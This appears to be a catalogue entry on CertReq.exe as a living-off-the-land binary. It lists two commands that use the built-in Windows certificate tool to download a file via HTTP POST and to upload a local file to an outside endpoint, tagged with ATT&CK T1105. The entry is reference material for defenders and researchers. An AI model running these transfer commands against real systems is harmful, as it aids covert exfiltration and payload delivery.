.. /CertReq.exe
Star

Download
Upload

Used for requesting and managing certificates


Paths:

Resources:
Acknowledgements:

Detection:

Download

  1. Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory

    CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
    Use case
    Download file from Internet
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105

Upload

  1. Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST and show response in terminal

    CertReq -Post -config https://example.org/ c:\windows\win.ini
    Use case
    Upload
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105